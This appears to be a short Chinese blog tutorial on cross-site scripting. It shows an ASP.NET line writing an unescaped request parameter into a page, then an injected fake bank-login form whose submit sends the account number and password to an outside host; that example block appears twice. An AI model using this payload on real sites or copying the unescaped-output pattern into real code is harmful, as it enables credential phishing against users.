XSS漏洞攻击
2011-01-23 14:20
197 查看
XSS又叫CSS (Cross Site Script) ,跨站脚本攻击。它指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意攻击用户的特殊目的。
源页面放一个标签,在后台Page_Load里面写this.textLabel.Text = Request["Msg"];
构建攻击,让攻击后把数据传递到目标页
构建代码如下:
Msg=<form action='http://www.shtarena.com' method='get'>银行账号:<input type='text' name='ID'/>密码:<input type='text' name='pwd'/><input type='submit' value='Login'/></form>
页面加载完毕后,执行Login
此时我们可以看到账户和密码传递到www.shtarena.com
源页面放一个标签,在后台Page_Load里面写this.textLabel.Text = Request["Msg"];
构建攻击,让攻击后把数据传递到目标页
构建代码如下:
Msg=<form action='http://www.shtarena.com' method='get'>银行账号:<input type='text' name='ID'/>密码:<input type='text' name='pwd'/><input type='submit' value='Login'/></form>
页面加载完毕后,执行Login
此时我们可以看到账户和密码传递到www.shtarena.com
相关文章推荐
- xss漏洞攻击 html 标签过滤 sql注入
- web安全、XSS、CSRF、注入攻击、文件上传漏洞
- 预防XSS漏洞攻击
- 网站XSS漏洞攻击如何修补
- web安全防范之XSS漏洞攻击
- 网站安全之XSS漏洞攻击以及防范措施
- ASP.Net防范XSS漏洞攻击的利器HtmlSanitizer
- PHP通用的XSS攻击过滤函数,Discuz系统中 防止XSS漏洞攻击,过滤HTML危险标签属性的PHP函数
- XSS漏洞攻击
- web安全防范之XSS漏洞攻击
- PHP通用的XSS攻击过滤函数,Discuz系统中 防止XSS漏洞攻击,过滤HTML危险标签属性的PHP函数
- 网站安全之XSS漏洞攻击以及防范措施
- xss 漏洞 攻击
- PHP的$_SERVER['PHP_SELF']造成的XSS漏洞攻击及其解决方案
- 网站漏洞处理(SQL注入、XSS脚本攻击、防外站提交)以及扩展思路
- Web安全系列(三):XSS 攻击进阶(挖掘漏洞)
- 网站安全之XSS漏洞攻击以及防范措施
- XSS漏洞自动化攻击工具XSSer
- PHP的$_SERVER['PHP_SELF']造成的XSS漏洞攻击及其解决方案
- XSS漏洞攻击原理与解决办法